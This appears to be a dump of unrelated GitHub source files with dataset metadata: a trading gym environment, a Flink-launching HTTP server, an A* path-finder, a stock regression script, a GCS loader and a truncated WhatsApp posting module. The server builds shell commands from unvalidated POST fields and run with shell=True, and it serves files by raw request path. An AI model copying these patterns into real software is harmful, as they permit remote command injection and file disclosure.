def __init__(self, period, interval):\n self.time = np.random.randint(low=0, high=MAX_INDEX-WINDOW)\n self.tickers = []\n\n states = fetch_data(period, interval)\n for state in states:\n state_edit = state.drop(columns=['Dividends', 'Stock Splits'])\n state_edit = dropna(state_edit)\n state_edit = state_edit.reset_index()\n # state_edit = add_all_ta_features(\n # state_edit, open=\"Open\", high=\"High\", low=\"Low\", close=\"Close\", volume=\"Volume\", fillna=True)\n self.tickers.append(state_edit)\n # state.iloc[START_INDEX:START_INDEX+WINDOW][[\"High\", \"Low\", \"Close\", \"Volume\"]].to_numpy())\n self.tick()\n\n def get_price(self, ticker):\n index = AVAILABLE_TICKERS.index(ticker)\n return self.state[index].iloc[-1][\"Close\"]\n\n def get_ticker_states(self):\n return self.state\n\n def reached_limit(self):\n return self.time >= MAX_INDEX\n\n def tick(self):\n self.time += 1\n\n # if self.time % 100 == 0:\n # print(\"Time: \" + str(self.time))\n\n self.state = []\n for curr in self.tickers:\n self.state.append(\n curr.iloc[START_INDEX+self.time:START_INDEX+WINDOW+self.time]\n )\n\n #self.tickers = np.array(self.tickers)\n\n\nclass Portfolio():\n def __init__(self, period, interval, cash=1000, order_price=0, sell_price=0):\n self.cash = cash\n self.portfolio = {\"cash\": cash, \"stocks\": {}}\n self.order_price = order_price\n self.sell_price = sell_price\n self.bank = Bank(period, interval)\n\n self.num_sells = 0\n self.num_buys = 0\n\n def buy(self, ticker, amount):\n price = self.bank.get_price(ticker)\n if price > self.cash:\n return -1\n\n self.cash -= price + self.order_price\n\n self.portfolio[\"cash\"] = self.cash\n\n if ticker not in self.portfolio[\"stocks\"]:\n self.portfolio[\"stocks\"][ticker] = 0\n\n self.portfolio[\"stocks\"][ticker] += 1\n self.num_buys += 1\n return 0\n\n def sell(self, ticker, amount):\n\n if not ticker in self.portfolio[\"stocks\"]:\n return -1\n\n if self.portfolio[\"stocks\"][ticker] < amount:\n return -1\n\n price = self.bank.get_price(ticker)\n\n self.cash += (price * amount) - self.sell_price\n\n self.portfolio[\"cash\"] = self.cash\n\n self.portfolio[\"stocks\"][ticker] -= amount\n self.num_sells += 1\n return 0\n\n def get_worth(self):\n worth = self.cash\n for ticker in self.portfolio[\"stocks\"]:\n worth += self.portfolio[\"stocks\"][ticker] * \\\n self.bank.get_price(ticker)\n\n return worth\n\n def get_state(self):\n return self.portfolio, self.bank.get_ticker_states()\n\n def tick(self):\n self.bank.tick()\n\n\nclass BrokerEnv(gym.Env):\n metadata = {'render.modes': ['human']}\n\n def __init__(self, period=\"10y\", interval=\"1d\"):\n self.period = period\n self.interval = interval\n self.feature_gen = FeatureGenerator()\n self.reset()\n self.worth = self.portfolio.get_worth()\n\n def _get_state(self):\n return self.portfolio.get_state()\n\n def get_portfolio(self):\n return self.portfolio\n\n def reset(self):\n self.portfolio = Portfolio(self.period, self.interval)\n self.worth = self.portfolio.get_worth()\n return self.feature_gen.generate(self._get_state())\n\n def render(self, mode):\n print(\"State: \" + str(self.portfolio.get_state()\n [0]) + \"\\nValue: \" + str(self.worth))\n\n print(\"Sells: \" + str(self.portfolio.num_sells))\n print(\"Buys: \" + str(self.portfolio.num_buys))\n print(\"-----------\\n\\n\")\n\n def step(self, action):\n \"\"\"\n action: List of tuples with (\"TICKER\", action) where action: buy=0, sell=1, hold=2\n \"\"\"\n action = [(\"MSFT\", action)]\n self.portfolio.tick()\n\n outcome = 0\n for (ticker, 
order) in action:\n if order == 0:\n outcome += self.portfolio.buy(ticker, 1)\n elif order == 1:\n outcome += self.portfolio.sell(ticker, 1)\n\n difference = self.portfolio.get_worth() - self.worth\n self.worth = self.portfolio.get_worth()\n\n info = {\"tickers\": AVAILABLE_TICKERS}\n\n return self.feature_gen.generate(self._get_state()), difference, False, info\n\n\nclass BrokerEnvTF(py_environment.PyEnvironment):\n\n def __init__(self, period=\"10y\", interval=\"1d\"):\n self.period = period\n self.interval = interval\n self.feature_gen = FeatureGenerator()\n self.reset()\n self.worth = self.portfolio.get_worth()\n\n self._action_spec = array_spec.BoundedArraySpec(\n shape=(), dtype=np.int32, minimum=0, maximum=2, name='action')\n\n self._observation_spec = array_spec.BoundedArraySpec(\n shape=(1, 997,), dtype=np.float64, name='observation')\n\n def action_spec(self):\n return self._action_spec\n\n def observation_spec(self):\n return self._observation_spec\n\n def get_portfolio(self):\n return self.portfolio\n\n def _reset(self):\n self.portfolio = Portfolio(self.period, self.interval)\n self.worth = self.portfolio.get_worth()\n return ts.restart(\n #np.array([[0, 2], [2, 3]], dtype=np.int32),\n self.feature_gen.generate(self._get_state()),\n )\n\n def _render(self, mode):\n print(\"State: \" + str(self.portfolio.get_state()\n [0]) + \"\\nValue: \" + str(self.worth))\n\n print(\"Sells: \" + str(self.portfolio.num_sells))\n print(\"Buys: \" + str(self.portfolio.num_buys))\n print(\"-----------\\n\\n\")\n\n def _get_state(self):\n return self.portfolio.get_state()\n\n def _step(self, action):\n \"\"\"\n action: List of tuples with (\"TICKER\", action) where action: buy=0, sell=1, hold=2\n \"\"\"\n action = [(\"MSFT\", action)]\n self.portfolio.tick()\n\n difference = 0\n outcome = 0\n for (ticker, order) in action:\n if order == 0:\n outcome += self.portfolio.buy(ticker, 1)\n elif order == 1:\n outcome += self.portfolio.sell(ticker, 1)\n else:\n # Punish for not performing an action\n difference = -10\n\n difference += self.portfolio.get_worth() - self.worth\n\n # Punish illegal action\n difference += 10 * outcome\n\n self.worth = self.portfolio.get_worth()\n\n info = {\"tickers\": AVAILABLE_TICKERS}\n\n \"\"\"\n When time limit is reached return termination to avoid out of bounds\n \"\"\"\n if self.portfolio.bank.reached_limit():\n return ts.termination(\n self.feature_gen.generate(self._get_state()),\n reward=difference,\n )\n\n return ts.transition(\n self.feature_gen.generate(self._get_state()),\n reward=difference,\n discount=0.1\n )\n", "repo_name": "ju-leon/NEATBroker", "sub_path": "trading_gym/broker.py", "file_name": "broker.py", "file_ext": "py", "file_size_in_byte": 8079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yfinance.Ticker", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "ta.utils.dropna", "line_number": 46, "usage_type": "call"}, {"api_name": "gym.Env", "line_number": 139, "usage_type": "attribute"}, {"api_name": "trading_gym.feature_gen.FeatureGenerator", "line_number": 145, "usage_type": "call"}, {"api_name": "tf_agents.environments.py_environment.PyEnvironment", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tf_agents.environments.py_environment", "line_number": 190, "usage_type": "name"}, {"api_name": 
"trading_gym.feature_gen.FeatureGenerator", "line_number": 195, "usage_type": "call"}, {"api_name": "tf_agents.specs.array_spec.BoundedArraySpec", "line_number": 199, "usage_type": "call"}, {"api_name": "tf_agents.specs.array_spec", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.int32", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tf_agents.specs.array_spec.BoundedArraySpec", "line_number": 202, "usage_type": "call"}, {"api_name": "tf_agents.specs.array_spec", "line_number": 202, "usage_type": "name"}, {"api_name": "numpy.float64", "line_number": 203, "usage_type": "attribute"}, {"api_name": "tf_agents.trajectories.time_step.restart", "line_number": 217, "usage_type": "call"}, {"api_name": "tf_agents.trajectories.time_step", "line_number": 217, "usage_type": "name"}, {"api_name": "tf_agents.trajectories.time_step.termination", "line_number": 264, "usage_type": "call"}, {"api_name": "tf_agents.trajectories.time_step", "line_number": 264, "usage_type": "name"}, {"api_name": "tf_agents.trajectories.time_step.transition", "line_number": 269, "usage_type": "call"}, {"api_name": "tf_agents.trajectories.time_step", "line_number": 269, "usage_type": "name"}]} +{"seq_id": "34092391391", "text": "#!/usr/bin/env python\n\"\"\"\nVery simple HTTP server in python (Updated for Python 3.7)\n\nUsage:\n\n ./dummy-web-server.py -h\n ./dummy-web-server.py -l localhost -p 8000\n\nSend a GET request:\n\n curl http://localhost:8000\n\nSend a HEAD request:\n\n curl -I http://localhost:8000\n\nSend a POST request:\n\n curl -d \"foo=bar&bin=baz\" http://localhost:8000\n\n\"\"\"\nimport re\nimport json\nimport argparse\nimport os\nimport subprocess\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom io import BytesIO\n\njobs = []\n\n\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n \n def do_GET(self):\n root = os.path.dirname(os.path.realpath(__file__))\n if self.path == '/':\n filename = root + '/index.html'\n else:\n filename = root + self.path\n \n self.send_response(200)\n if filename[-4:] == '.css':\n self.send_header('Content-type', 'text/css')\n elif filename[-5:] == '.json':\n self.send_header('Content-type', 'application/javascript')\n elif filename[-3:] == '.js':\n self.send_header('Content-type', 'application/javascript')\n elif filename[-4:] == '.ico':\n self.send_header('Content-type', 'image/x-icon')\n else:\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open(filename, 'rb') as fh:\n html = fh.read()\n self.wfile.write(html)\n \n def do_POST(self):\n global jobs\n content_len = int(self.headers.get('Content-Length'))\n if self.path == '/start':\n tmp_body = self.rfile.read(content_len).decode()\n body = json.loads(tmp_body)\n cmd = 'flink run --parallelism 16 -d $ARTIFACTS/$JOB_NAME '\n cmd += ' --algorithm ' + str(body[\"algorithm\"])\n cmd += ' --W \"' + str(body[\"w\"]) + '\"'\n cmd += ' --S \"' + str(body[\"s\"]) + '\"'\n cmd += ' --k \"' + str(body[\"k\"]) + '\"'\n cmd += ' --R \"' + str(body[\"r\"]) + '\"'\n cmd += ' --dataset ' + str(body[\"dataset\"])\n cmd += ' --partitioning ' + str(body[\"partitioning\"])\n cmd += ' --sample_size ' + str(body[\"treeNumber\"])\n cmd += ' --partitions \"' + str(body[\"partitions\"]) + '\"'\n cmd += ' --distance \"' + str(body[\"distance\"]) + '\"'\n cmd += ' --policy ' + str(body[\"adaptivity\"])\n if body[\"adaptivity\"] != \"static\":\n cmd += ' --adapt_range ' + 
str(body[\"range\"])\n cmd += ' --adapt_over ' + str(body[\"overload\"])\n cmd += ' --adapt_cost ' + str(body[\"cost_function\"])\n cmd += ' --buffer_period ' + str(body[\"buffer_period\"])\n if body[\"adaptivity\"] == \"advanced\":\n cmd += ' --adapt_queue ' + str(body[\"queue\"])\n cmd += ' --adapt_under ' + str(body[\"underload\"])\n cmd += ' && flink run -d -c custom_source.Custom_source $ARTIFACTS/$JOB_NAME --dataset ' + body[\"dataset\"]\n result = subprocess.run([cmd], shell=True, stdout=subprocess.PIPE).stdout.decode('utf-8')\n jobs = [r.split()[1] for r in re.findall(\"JobID \\w*\", result)]\n elif self.path == '/stop':\n for job in jobs:\n cmd = 'flink cancel ' + job\n result = subprocess.run([cmd], shell=True, stdout=subprocess.PIPE).stdout.decode('utf-8')\n self.send_response(200)\n self.end_headers()\n response = BytesIO()\n self.wfile.write(response.getvalue())\n\n\ndef run(server_class=HTTPServer, handler_class=S, addr=\"0.0.0.0\", port=8000):\n server_address = (addr, port)\n httpd = server_class(server_address, handler_class)\n\n print(\"Starting httpd server\")\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Run a simple HTTP server\")\n parser.add_argument(\n \"-l\",\n \"--listen\",\n default=\"0.0.0.0\",\n help=\"Specify the IP address on which the server listens\",\n )\n parser.add_argument(\n \"-p\",\n \"--port\",\n type=int,\n default=8000,\n help=\"Specify the port on which the server listens\",\n )\n args = parser.parse_args()\n run(addr=args.listen, port=args.port)\n", "repo_name": "tatoliop/PROUD-PaRallel-OUtlier-Detection-for-streams", "sub_path": "docker/outliers_flink/assets/server/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 41, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 68, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 90, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 91, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 95, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 95, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 98, "usage_type": "call"}, {"api_name": "http.server.HTTPServer", "line_number": 102, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "36230537976", "text": "import cv2\nimport numpy as np \n\nclass Node:\n def __init__(self, parent=None, position=None):\n self.parent = parent\n self.position = position\n self.g = 0\n self.h = 0\n self.f = 0\n def __eq__(self, other):\n return self.position == other.position\n \ndef return_path(current_node):\n path =[]\n current = current_node\n while current is not None:\n path.append(current.position)\n current = current.parent\n path = path[::-1]\n return path\n\ndef search(maze, cost, start, end):\n start_node = Node(None, tuple(start))\n start_node.g = start_node.h = start_node.f = 0\n end_node = Node(None, tuple(end))\n end_node.g = 
end_node.h = end_node.f = 0\n yet_to_visit_list = [] \n visited_list = [] \n yet_to_visit_list.append(start_node)\n move = [[-1, 0 ], [ 0, -1], [ 1, 0 ],[ 0, 1 ]]\n no_rows,no_columns= np.shape(maze)\n while len(yet_to_visit_list) > 0:\n current_node = yet_to_visit_list[0]\n current_index = 0\n for index, item in enumerate(yet_to_visit_list):\n if item.f < current_node.f:\n current_node = item\n current_index = index\n yet_to_visit_list.pop(current_index)\n visited_list.append(current_node)\n if current_node == end_node:\n return return_path(current_node)\n children = []\n for new_position in move: \n node_position = (current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])\n if (node_position[0] > (no_rows - 1) or node_position[0] < 0 or node_position[1] > (no_columns -1) or node_position[1] < 0):\n continue\n if maze[node_position[0]][node_position[1]] != 0:\n continue\n new_node = Node(current_node, node_position)\n children.append(new_node)\n for child in children:\n if len([visited_child for visited_child in visited_list if visited_child == child]) > 0:\n continue\n child.g = current_node.g + cost\n child.h = (((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)) \n child.f = child.g + child.h\n if len([i for i in yet_to_visit_list if child == i and child.g > i.g]) > 0:\n continue\n yet_to_visit_list.append(child)\n #print(child.position[0],child.position[1])\n\nif __name__==\"__main__\":\n \n #b2\n #end=[505,549]\n #start=[431,272]\n #start=[100,490]\n #start=[600,560]\n #start=[169,410]\n #------------\n #start=[645,318]-1st\n start=[620,134]#-2nd\n end=[502,570]\n #end=[320,568]\n #end=[155,567]\n cost=1\n img = cv2.imread(r\"C:\\Users\\SUSMITHA\\AppData\\Local\\Programs\\Python\\Python39\\final.jpg\",1)\n cropped_img=img[789:1867,153:3340]\n copy_img=cv2.resize(cropped_img,(700,700))\n cv2.imwrite(\"sq.jpg\",copy_img)\n gray_img = cv2.cvtColor(copy_img,cv2.COLOR_RGB2GRAY)\n gray_img = cv2.GaussianBlur(gray_img, (3,3), 0)\n ret,thresh1 = cv2.threshold(gray_img,230,255,cv2.THRESH_BINARY_INV)\n height=thresh1.shape[1]\n width=thresh1.shape[0]\n maze=[]\n for y in range(width):\n n=[]\n for x in range(height):\n n.append(int(thresh1[y,x]/255))\n maze.append(n)\n ma=[[maze[j][i] for j in range(len(maze))] for i in range(len(maze[0]))]\n path=[]\n path=search(ma,cost,start,end)\n if((copy_img[tuple(start)][0]==1 or copy_img[tuple(start)][1]==1 or copy_img[tuple(start)][2]==1 )or (copy_img[tuple(end)][0]==1 or copy_img[tuple(end)][1]==1 or copy_img[tuple(end)][2]==1)):\n print(\"No possible path\")\n elif not path:\n cv2.circle(copy_img, tuple(start), 5,(0,0,255),-1)\n cv2.circle(copy_img, tuple(end), 5,(0,0,255),-1)\n cv2.imshow(\"result\",copy_img)\n print(\"No possible path\")\n else:\n pa=[[path[j][i] for j in range(len(path))] for i in range(len(path[0]))]\n pa.pop()\n cv2.circle(copy_img, tuple(start), 5,(0,0,255),-1)\n cv2.circle(copy_img, tuple(end), 5,(0,0,255),-1)\n for i in range(len(path)-1):\n cv2.line(copy_img,path[i],path[i+1],(255,0,0),3)\n cv2.imshow(\"result\",copy_img)\n cv2.imwrite(\"result.jpg\",copy_img)\n cv2.waitKey(0)\n", "repo_name": "Joshna-Rajendran/Indoor_Positioning_Beacons", "sub_path": "Positioing/image_processing_2.py", "file_name": "image_processing_2.py", "file_ext": "py", "file_size_in_byte": 4318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.shape", "line_number": 32, "usage_type": 
"call"}, {"api_name": "cv2.imread", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 85, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "1918294174", "text": "import pandas as pd\nimport quandl\nimport math, datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\nfrom sklearn import preprocessing, cross_validation, svm\nfrom sklearn.linear_model import LinearRegression\nimport pickle\n\n# Problem with this : we are feeding \"future\" prices as label into algorithm,\n# the machine learning algorithm figures that we had shifted\n# the prices 0.01*len into the past lol\n\ndf = quandl.get('WIKI/GOOGL')\ndf = df[['Adj. Open', 'Adj. High', 'Adj. Low', 'Adj. Close', 'Adj. Volume']]\n\"\"\"\nhigh and low -> diff -> volutality\nopen and clode -> price go up or down\nSimple regression will not be able to identify these relationships\nSo its better if we are able to extract these relationships first and use\nregression on that instead of just numbers.\n\"\"\"\ndf['high_low_perc_change'] = ((df['Adj. High'] - df['Adj. Low'])/df['Adj. High'])*100.0\ndf['close_open_perc_change'] = ((df['Adj. Close'] - df['Adj. Open'])/df['Adj. Open'])*100.0\ndf = df[['Adj. Close', 'high_low_perc_change', 'close_open_perc_change', 'Adj. Volume']]\n\n# print(df.head())\n\nforecast_col = 'Adj. 
Close'\n# -99999 will just set it as an outlier, advantage-> we are not getting rid of the data\ndf.fillna(-99999, inplace=True)\n\n# predict 10%\nforecast_out = int(math.ceil(0.01*len(df)))\n\n# so now we are shifting up by 30 days, so we will have a label col\n# day for any row given we will have the label col with it closing price after 30 days\ndf['label'] = df[forecast_col].shift(-forecast_out)\n# print(df.head())\n\n# {0 or ‘index’, 1 or ‘columns’}, default 0\nx = np.array(df.drop(['label'],1))\n\"\"\"\nSource: Sklearn, https://scikit-learn.org/stable/modules/preprocessing.html\nStandardization of datasets is a common requirement for many machine\nlearning estimators implemented in scikit-learn;\nthey might behave badly if the individual features do not more or less\nlook like standard normally distributed data: Gaussian with zero mean and unit variance.\nIn practice we often ignore the shape of the distribution and just transform the data to\ncenter it by removing the mean value of each feature, then scale it by dividing\nnon-constant features by their standard deviation.\n\nFor instance, many elements used in the objective function of a learning\nalgorithm (such as the RBF kernel of Support Vector Machines or the l1 and\nl2 regularizers of linear models) assume that all features are centered around\nzero and have variance in the same order. If a feature has a variance that is\norders of magnitude larger than others,\nit might dominate the objective function and make the estimator unable to learn\nfrom other features correctly as expected.\n\"\"\"\nx = preprocessing.scale(x)\nx_pred = x[-forecast_out:]\nx = x[:-forecast_out]\ndf.dropna(inplace=True)\n# print(len(x),len(y))\ny = np.array(df['label'])\n\n# splitting the data into 20% test data\nx_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.2)\n# we can thread massively in linear regression as well, usinh n_jobs\n# -1 for as many as possible on your system, significantly faster training period\nclf = LinearRegression(n_jobs=-1)\n# clf = svm.SVR()\n# train\n#clf.fit(x_train, y_train)\n\n# saving the classifier\n#with open('stock_regression_clf.pickle','wb') as file:\n# pickle.dump(clf,file)\n\npickle_in = open('stock_regression_clf.pickle','rb')\nclf = pickle.load(pickle_in)\n\n# test\naccuracy = clf.score(x_test, y_test)\n# sq. error\nprint(str(accuracy*100.0)+\"%\")\n\n# make pred\ny_pred = clf.predict(x_pred)\n# print(y_pred, accuracy)\n\n\n# plotting\nstyle.use('ggplot')\ndf['Forecast'] = np.nan\n\nlast_date = df.iloc[-1].name\nlast_unix = last_date.timestamp()\none_day = 86400\nnext_unix = last_unix + one_day\n\nfor i in y_pred:\n next_date = datetime.datetime.fromtimestamp(next_unix)\n next_unix += 86400\n df.loc[next_date] = [np.nan for _ in range(len(df.columns)-1)]+[i]\n # print(df.loc[next_date])\n\ndf['Adj. 
Close'].plot()\ndf['Forecast'].plot()\nplt.legend(loc=4)\nplt.xlabel('Date')\nplt.ylabel('Price')\nplt.show()\n", "repo_name": "Satwik95/ML-practice", "sub_path": "regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 4028, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "quandl.get", "line_number": 15, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 70, "usage_type": "name"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 73, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.style.use", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.style", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 107, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "3673115501", "text": "\"\"\"Python module related to load data\"\"\"\n\nfrom prefect_gcp.credentials import GcpCredentials\nfrom google.cloud import storage\n\ndef load_file_into_memory(\n load_dir: str, file_name: str, extension: str, load_location: str = \"local\"\n):\n\n \"\"\"Load a file to stream\n\n Parameters\n ----------\n load_dir : str\n The directory to load the file from\n file_name : str\n The name of the file to load\n extension : str\n The extension of the file\n load_location : str, optional\n The location to load the file from, by default \"local\"\n \"\"\"\n\n # Construct the load file path\n file_name_with_suffix_and_extension = f\"{file_name}.{extension}\"\n load_path = f\"{load_dir}/{file_name_with_suffix_and_extension}\"\n\n if load_location == \"gcs\":\n\n # Load Credentials and Config\n gcp_credentials = GcpCredentials.load(\"gcp-credentials\")\n project_id = gcp_credentials.project\n\n # Init Client\n client = storage.Client(project=project_id)\n gcs_bucket = client.get_bucket(\"serpapi_jobs\") \n\n # Download from GCS\n blob = gcs_bucket.blob(load_path)\n bytes = blob.download_as_bytes()\n\n return bytes\n\n", "repo_name": "m-p-esser/data-job-pipeline", "sub_path": "src/etl/load.py", "file_name": "load.py", 
"file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "prefect_gcp.credentials.GcpCredentials.load", "line_number": 31, "usage_type": "call"}, {"api_name": "prefect_gcp.credentials.GcpCredentials", "line_number": 31, "usage_type": "name"}, {"api_name": "google.cloud.storage.Client", "line_number": 35, "usage_type": "call"}, {"api_name": "google.cloud.storage", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "2420807694", "text": "\nimport frappe\nimport requests\nimport json\nfrom datetime import datetime\n#from frappe.model.document import Document\n\n#class WhatsappPost(Document):\n#\tpass\nfrom frappe.model.document import Document\n\nclass WhatsappPost(Document):\n\tdef validate(self):\n\t\tif self.scheduled_time:\n\t\t\tcurrent_time = frappe.utils.now_datetime()\n\t\t\tscheduled_time = frappe.utils.get_datetime(self.scheduled_time)\n\t\t\tif scheduled_time < current_time:\n\t\t\t\tfrappe.throw((\"Scheduled Time must be future time.\"))\n#\t\tfrappe.db.set_value(post_status = 'Scheduled'\n#\t\tfrappe.db.commit()\n\t\tself.template_status()\n\tdef template_status(self):\n\t\ttemp = frappe.get_doc('Whatsapp Template',self.message_template)\n\t\tif temp.temp_status == 'Approved':\n\t\t\tpass\n\t\telse:\n\t\t\tfrappe.throw(('Whatsapp Template status not Approved yet, update the status or try again later'))\n\n\tdef after_insert(self):\n#\t\tfrappe.db.set_value(\"Whatsapp Post\",self.name,\"post_status\",'Scheduled')\n#\t\tfrappe.db.commit()\n#\t\tself.append('campaign_status',{'title':self.name,'sent_status':'0','pending_status':'0','read_status':'0','failed_status':'0'})\n\t\tself.post_status = 'Scheduled'\n\t\tself.save()\n\n\t@frappe.whitelist()\n\tdef message_post(self):\n\n\t\tprint(self.message_template)\n\t\t# MessageBird Access Token\n\t\tmessagebird_doc = frappe.get_single('Messagebird Setting')\n\t\tmessagebird_token = messagebird_doc.get_password('access_token')\n\t\t# Whatsapp Sender Access Token\n\t\twhatsapp_token = frappe.get_value('Whatsapp Setting',self.msg_sender,'whatsapp_access_token')\n\t\t# Whatsapp Message Template\n\t\tmessage = self.message_template\n\t\t# Recipents\n\t\tcontact_table = frappe.get_doc('Contact Group',self.msg_to)\n\t\tprint('loop')\n\t\tfor entry in contact_table.contact:\n\t\t\tprint('loop0')\n\t\t\tnumber = frappe.get_value('Customer',((frappe.get_doc('Contact Group Member',entry.get('contacts'))).contact),'mobile_no')\n\t\t\tprint(number)\n\t\t\tresponse = self.post(messagebird_token,whatsapp_token,message,number)\n\t\t\tresponse = json.loads(response)\n\n\t\t\t#Creating message\n\n#\t\t\tdoc = frappe.new_doc('Message')\n#\t\t\tdoc.message_text = message\n#\t\t\tdoc.message_id = response['id']\n#\t\t\tdoc.contact_id = frappe.get_doc('Sync contact',frappe.get_doc('Contact Group Member',entry.get('contacts')).contact).customer_id\n#\t\t\tdoc.insert()\n\n\n#\t\t\ttime = re.search(r'\\d{2}:\\d{2}:\\d{2}', response['updatedDatetime']).group()\n#\t\t\tdate = re.search(r'\\d{4}-\\d{2}-\\d{2}', response['updatedDatetime']).group()\n#\n#\t\t\tdate_time = datetime.strptime(f'{date} {time}', '%Y-%m-%d %H:%M:%S')\n#\t\t\tdate_time_format = date_time.strftime(\"%d-%m-%Y %H:%M:%S\")\n\t\t\t#Linking Message to Contact\n\n\t\t\tdoc = frappe.get_doc('Sync contact',frappe.get_doc('Contact Group 
Member',entry.get('contacts')).contact)\n\t\t\tdoc.append(\"message\",{\"status_update_time\":frappe.utils.now_datetime(),\"status\":response[\"status\"].upper(),\"campaign\":self.name,\"sent_time\":frappe.utils.now_datetime(),\"message_text\": message,\"message_id\":response['id'],\"contact_id\":frappe.get_doc('Sync contact',frappe.get_doc('Contact Group Member',entry.get('contacts')).contact).customer_id})\n\t\t\tdoc.save()\n\n\t\tfrappe.db.set_value(\"Whatsapp Post\",self.name,\"post_status\",'Posted')\n\t\tfrappe.db.commit()\n\tdef post(self,messagebird_token,whatsapp_token,message,number):\n\t\tprint('defi')\n\t\turl = \"https://conversations.messagebird.com/v1/send\"\n\t\tpayload = json.dumps({\n \t\t\t\"to\": number,\n \t\t\t\"from\": whatsapp_token,\n \t\t\t\"type\": \"hsm\",\n \t\t\t\"content\": {\n\t\t\t\t\"hsm\": {\n\t\t\t\t\t\"namespace\": \"5ba2d0b7_f2c6_433b_a66e_57b009ceb6ff\",\n\t\t\t\t\t\"templateName\": message,\n\t\t\t\t\t\"language\": {\n\t\t\t\t\t\"policy\": \"deterministic\",\n\t\t\t\t\t\"code\": \"en\"\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\n\t\theaders = {\n\t\t\t'Authorization': f'AccessKey {messagebird_token}',\n\t\t\t'Content-Type': 